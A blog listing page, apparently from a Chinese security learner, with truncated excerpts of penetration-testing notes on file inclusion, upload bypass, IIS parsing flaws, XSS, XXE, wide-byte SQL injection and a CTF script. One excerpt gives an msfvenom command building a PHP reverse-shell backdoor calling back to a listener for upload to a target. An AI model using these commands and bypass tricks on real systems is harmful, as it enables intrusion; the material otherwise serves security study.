- 博客(63)
- 资源 (1)
- 收藏
- 关注
RSS订阅原创 bagku秋名山老司机
看题目,要求两秒内计算数值,发回去,获得flag,于是写脚本实现 import requestsimport reurl = "http://120.24.86.145:8002/qiumingshan/"s = requests.Session()#必须利用会话对象 Session(),否则提交结果的时候,页面又重新生成一个新的表达式,source = s.get(u...
2018-10-14 10:14:50
993
转载 kali扩容
kali虚拟机根目录扩容注意:操作之前一定要将虚拟机所有文件进行备份!备份!备份!(不是快照!)不保证方法一定有效,扩容出错本人概不负责0x01 背景随着kali的使用与更新,我们原本分配的硬盘大小也就往往无法满足我们的要求,以我的使用为例,原先分配的20G空间早已无法满足要求,所以开始寻找kali根目录扩展的方法0x02 常用扩容方式1.常用的的扩容方法为vmware(vbo...
2018-10-09 09:38:27
1334
1
原创 电商类漏洞
5.1验证码回传漏洞抓取response数据包检查信息。 5.2任意用户注册漏洞 第一步,利用自己的手机号接收验证码进行验证,下一步跳转到一个设定密码的页面 第二步,抓包,篡改手机号,使用任意手机号进行注册 5.3短信轰炸第一种,有一定时间间隔,无限下发。第二种,无限制,无限下发。 5.4暴力破解暴力穷举的方式大量尝试性的猜破密码。 ...
2018-10-06 19:39:16
801
原创 get和post区别
GET请求只能进行url编码,而POST支持多种编码方式。 GET请求在URL中传送的参数是有长度限制的,而POST没有。 对参数的数据类型,GET只接受ASCII字符,而POST没有限制。 GET比POST更不安全,因为参数直接暴露在URL上,所以不能用来传递敏感信息。 GET参数通过URL传递,POST放在Request body中。 GET产生一...
2018-10-06 19:38:41
264
原创 渗透思路
4. 公司获得授权对一家金融公司从外网做白盒测试,目标是取得内网域控权限及核心业务系统权限,请具体描述您的渗透步骤。 第一步,明确目标并进行信息收集: 包括但不限于:whois、网站源IP、旁站、C段网站、服务器系统版本、容器版本、程序版本、数据库类型、二级域名、...
2018-10-06 19:37:53
877
原创 cookie和session对比
Cookie 含义及作用 Cookie是网站服务器把少量的文本数据存储到客户端的硬盘或内存,或是从客户端读取数据的一种技术;当你浏览某个网站时,服务器会向你的电脑发送一个cookie文本文件,它可以记录你的ID、密码等信息,当你发起请求时,带上cookie,网站读取cookie,进而读取你的信息,继续进行相对应的动作,如:已通过验证,直接登录;Cookie主要作用:标识用户...
2018-10-06 19:36:27
415
原创 http基础知识
header:• Set-Cookie:server发送给client的SessionID• Cookie:client发送给server证明用户状态的信息(头:值成对出现)• Content-Length:响应body部分的字节长度• Location:重定向用户到另一个页面,可识别身份认证后允许访问的页面• ...
2018-10-06 19:34:58
156
原创 IIS服务器搭建即基础设置
iis服务器搭建:勾选应用程序服务器->Internet 信息服务 管理工具->iis管理器->新建网站 网站属性->主目录->配置修复目录遍历,关闭目录浏览; 添加默认主页 ...
2018-10-06 19:34:06
209
原创 命令执行基础知识
思维导图 命令执行含义 当应用需要调用一些外部程序去处理内容情况下,就会用到一些执行系统命令的函数,比如php中的system、exec、shell_exec、passthru、popen、popc_popen等,当用户调用这些函数时,将恶意系统命令注入到正常命令中,造成命令执行漏洞;PHP可动态执行PHP代码的有eval,jsp有Runtime、ge...
2018-10-06 19:30:58
8973
1
原创 常见逻辑漏洞
支付逻辑漏洞检测方法与案列支付漏洞一般分为三类,支付过程可直接修改数据包中的支付金额开发人员为了方便,导致支付的关键数据,能直接截包查看而重要的金额数据,在后端没有做校验,传递过程中也没有做签名,导致可以随意篡改金额. 没有对购买数量进行负数限制产生的原因是开发人员没有对购买的数量参数进行严格的限制,传输过程没有做签名,导致可随意修改,经典的修改方式就是...
2018-10-06 19:29:55
7401
2
原创 文件包含与目录遍历
directory traversal(目录遍历):使用者通过这个漏洞,修改url、参数变量,从而读取web根目录以外的文件内容; file include:开发员的include函数对输入变量过滤不够严格,导致系统文件,错误包含一、远程文件包含远程文件包含(RFI)发生在web应用程序下载并执行远程文件。这些远程文件通常的形式获得的HTTP或FTPURI作为一个web应用...
2018-10-06 19:28:45
2744
原创 SQL基础知识
创建数据库create database/schema study; 查看数据库结构show tables;查看所有数据库名称show databases; 选择数据库use table_schema;删除数据库drop database table_schema; 创建表create table student(id int primary...
2018-10-05 15:35:42
194
原创 SQL查询
子查询1 IN查询select sname from student where dept in ( select dept from depts where name = ‘ zhangsan’ )2 带有比较运算符子查询查询与zhangsan一个系的所有同学的名字 select sname from student where dept = ( select dept from...
2018-10-05 15:34:11
223
原创 sql日志及安全加固
日志种类:1. 错误日志(log-error) 2. 查询日志(log) 3. 二进制日志(log-bin)4. 慢查询日志(log-slow-queries) 5. 更新日志(log-update) 查看日志开启状态mysql>show global variables like ‘%log%’ 日志设置:1. 错误日志(log-error)...
2018-10-05 15:31:43
391
原创 SQL字符串连接函数
concat将多行数据查询后当做一行显示 字符串连接函数 concat(str1,str2..)函数 直接连接 group_concat(str1,str2..)函数 使用逗号做为分隔符 group_concat(id,' ',username,' ',password);用空格隔绝数据2 admin 123456 concat_ws(sep,str...
2018-10-05 15:30:30
4476
原创 SQL字符串连接函数
concat将多行数据查询后当做一行显示 字符串连接函数 concat(str1,str2..)函数 直接连接 group_concat(str1,str2..)函数 使用逗号做为分隔符 group_concat(id,' ',username,' ',password);用空格隔绝数据2 admin 123456 concat_ws(sep,str...
2018-10-05 15:23:04
8129
原创 SQL限制性语句和聚集函数
一般格式 select [*|distinct] 目标列表达式 [,目标列表达式]… from 表名 [,表名] |(select 语句)[as] 别名 [where 条件表达式][group by 列名1 [having 条件表达式]] [order by 列名2 [asc|desc]]; 1)消除值重复的行 (仅不显示重复的行)select distinct nam...
2018-10-05 15:22:02
1031
原创 sql语句字符串处理函数
函数database() 查询当前所使用的数据库名user() 或 current_user() 查询当前用户version() 或 @@version 查看当前数据库的版本 文本处理函数 eg:mysql> SELECT LEFT('foobarbar ' , 5)-> 'fooba ' mysql> SELECT LTRIM('...
2018-10-05 15:17:53
2803
原创 shell基本语法
1赋值a=123a=$p 2输入read-p 提示输入内容-t 指定取值等待时间(秒)read -p ‘please input your names:‘ a#提示语和变量之间一个空格,表示用一个空格,隔开输入;#if 以空格隔开,连续输入,则变量a为一个数组 3输出echo $a 条件判断 if [ “$pwd_entered...
2018-10-05 15:15:23
282
原创 文件包含知识点
文件包含概述 Web脚本可能允许客户端用户输入调用包含在服务器的文件,会导致恶意代码的执行以及敏感信息的泄露; 文件包含漏洞的产生:程序开发人员都希望代码更灵活,所以通常会将被包含的文件设 置为变量,用来进行动态调用,但正是由于这种灵活性,从而导客户 端可以调用一个恶意文件,造成文件包含漏洞。 web脚本可能允许客户端用户输入控制动态包含在服务器端的文件,会导 致恶意代码...
2018-10-05 15:14:30
516
原创 电商类逻辑漏洞
5.1验证码回传漏洞抓取response数据包检查信息。 5.2任意用户注册漏洞 第一步,利用自己的手机号接收验证码进行验证,下一步跳转到一个设定密码的页面 第二步,抓包,篡改手机号,使用任意手机号进行注册 5.3短信轰炸第一种,有一定时间间隔,无限下发。第二种,无限制,无限下发。 5.4暴力破解暴力穷举的方式大量尝试性的猜破密码。 ...
2018-10-05 15:11:30
1041
1
原创 web指纹识别
web指纹识别的核心原理是通过正则表达式匹配特征码或匹配文件的md5值等特殊信息,进而识别web应用程序的名称和版本,收集信息,以备攻击
2018-10-04 13:38:31
3022
1
原创 google hack 语法
intitle:搜索标题inurl:搜索urlintext:搜索网页正文内容+ 连接site: 在某网站下搜寻site: www.any.com + inurl:adminintext: to parent directory + intext : mdbfiletype: ppt,asp,phpintext:to parent dire...
2018-10-04 13:37:50
12791
3
原创 编码
base编码base64无规律均为字母数字123456:MTIzNDU2base32无规律均为字母数字123456:GEZDGNBVGY======base16 无规律的数字123456:313233343536 URL编码以%开头多用于对符号编码 , :%2C ' :%27" :%22 \ :%5C; : %3B ( ) : %28%29...
2018-10-04 13:37:11
190
原创 防范勒索病毒
1、关闭135、136、445端口。2、及时安装最新的安全补丁。3、安装防病毒软件。4、警惕不明网站链接与不明邮件,不轻易接入不明移动存储介质。5、监控内网环境,防止病毒在内网爆发。6、使用正版系统。...
2018-10-04 13:36:43
738
原创 Netbios
早期windows网络中使用的名称解析系统,,为网络上使用的IP地址提供可注册和解释的netbios名称的动态数据库; Smb(server message block)协议用于web连接和客户端与服务端的信息沟通,在windows NT/2000中用作文件共享;在windows NT中,使用137U,138U,139T端口在windows2000及其以上版本中.smb直接...
2018-10-04 13:36:15
2783
原创 IPC$空会话
IPC$(Internet Process Connection)是共享"命名管道"的资源,它是为了让进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,从而实现对远程计算机的访问。在同一时间内,两个IP之间只允许建立一个连接。1 SMB: (Server Message Block) Windows协议族,用于文件打印共...
2018-10-04 13:35:40
729
原创 137/138/139/445端口
同属于UDP端口,用于提供netbios服务,此服务用于提供计算机名称的查询使用者通过向某台计算机的137端口发起一个请求,就可以获取该计算机的名称、注册用户名,以及是否安装主域控制器、IIS是否运行等信息;Nbtstat –a ip停止NetBIOS方法很简单,鼠标右击桌面上的“网上邻居”图标,然后从弹出的快捷菜单中选择“属性”命令,再在“本地连接”中再一次点击右键,选择属...
2018-10-04 13:35:05
8829
原创 metasploit 自动化攻击
第一步开启postgresql数据库 第二步:切入到数据库中 第三步:创建用户名和密码 第四步进入数据库,创建数据库 第五步退出数据库进入msf 注意:1.开启数据库后进行的所有操作都可以保存在数据库中方便查阅 2.开启数据库后可以调用NMAP,nessus,等漏...
2018-10-04 13:34:25
2148
原创 中间件解析漏洞
IISIIS解析漏洞IIS 6.0解析利用方法有两种:1:文件解析在IIS6.0下,分号,冒号后面的不被解析,也就是说wooyun.asp;123.jpg会被服务器看成是wooyun.asp以下格式也会被解析:*.asa、*.asp,*.cer;*.cdx 2:目录解析当建立*.asa、*.asp格式的文件夹时,其目录下的任意文件都将被IIS当作asp文件...
2018-10-04 13:32:00
5403
原创 文件上传
文件上传绕过 常见限制绕过 白名单: 00截断绕过%00截断:url中%00后面的内容会被注释,一般用于URL中修改文件名0x00截断:0x00代表空字符,截断注释后面内容MIME限制改类型:绕过Content-Type检测文件类型上传当浏览器在上传文件到服务器端的时候,服务器对上传的文件Content-Type类型进行检测,如果是白名单允许的,...
2018-10-04 13:14:24
630
原创 xss基础知识
XSS概述指攻击者利用网站程序对用户的输入输出过滤不足,导致恶意代码在页面执行,对受害者造成cookie资料窃取、会话劫持、钓鱼欺骗等危害; XSS危害1.网络钓鱼,盗取各类用户的账号,如机器登录帐号、用户网银帐号、各类管理员帐号;2.窃取用户Cookie,获取用户隐私,或者利用用户身份进一步执行操作3.劫持用户(浏览器)会话,从而执行任意操作,例如进行非法转账、...
2018-10-03 10:47:01
5306
1
转载 搭建github
首先,我先对GitHub来一个简单的介绍,GitHub有一个很强大的功能就是,你在服务器上边可以创建一个库(稍后会介绍怎么创建),写代码是一件很重的任务,尤其是很多人完成一个很大的项目的时候,就十分的复杂,一群人一起来写某个项目,大家完成的时间,完成的进度都是不相同的,你写一点我写一点,甚至可能你今天写的出现了错误,影响到了我昨天写的代码,最后怎么才能将大家的代码轻松的汇总起来,又怎么在汇总所有人...
2018-08-27 18:47:23
183
转载 python3 urllib.parse.urljoin()用法
>>>from urllib.parse import urljoin>>> urljoin("http://www.chachabei.com/folder/currentpage.html", "anotherpage.html")'http://www.chachabei.com/folder/anotherpage.html'>>>
2018-07-01 17:23:16
1585
转载 xxe的攻击及防御
xml文档的基础组成XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素; DTD实体DTD实体是用于定义引用普通文本或特殊字符的快捷方式的变量,可以内部声明或外部引用。 实体又分为一般实体和参数实体1,一般实体的声明语法:<!ENTITY实体名 "实...
2018-06-30 15:11:56
6509
1
原创 中间件漏洞
IISIIS解析漏洞IIS6.0解析利用方法有两种:1:在IIS6.0下,分号,冒号后面的不被解析,也就是说wooyun.asp;123.jpg会被服务器看成是wooyun.asp 2:当建立*.asa、*.asp格式的文件夹时,其目录下的任意文件都将被IIS当作asp文件来解析。 3.默认解析:在默认Fast-CGI开启状况下,黑阔上传一个名字为wooyun.jpg,内容为<?PHPfp...
2018-06-25 14:03:19
442
原创 MSF建立webshell后门,并监听端口建立session连接
一 建立反弹后门msfvenom -p php/meterpreter/reverse_tcpLHOST=192.168.2.146 LPORT=5555 R > test3.php 注:生成的反弹木马存放在当前用户home目录下;将生成的木马上传到目标机中,可以远程访问;windows下asp反弹木马:root@kali:~# msfvenom -p windows/meterpret...
2018-06-23 15:56:33
12638
原创 MSF运用外部module提权
1 将下载的module复制到/usr/share/metasploit-framework/modules/exploits/linux/ ; 2 useexploit/linux/telnet/AF_PACKET 3 showoptions 4 exploit 查看当前所有会话msf exploit(linux/telnet/AF_PACKET) > sessions -l 选择...
2018-06-23 15:55:35
1184
原创 宽字节注入
由于php中,转义函数的存在,导致在' 等字符前加转义字符\,即 \' 导致 ' 被转义,无法注入;但通过输入%df和函数执行添加的%5C,被合并成%df%5C。由于GBK是两字节,这个%df%5C被MYSQL识别为GBK。导致本应的%df\变成%df%5C。%df%5C在GBK编码中没有对应,所以被当成无效字符。 %DF’ :会被PHP当中的addslashes函数转义为“%DF\'”,“\”...
2018-06-23 15:54:28
298
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人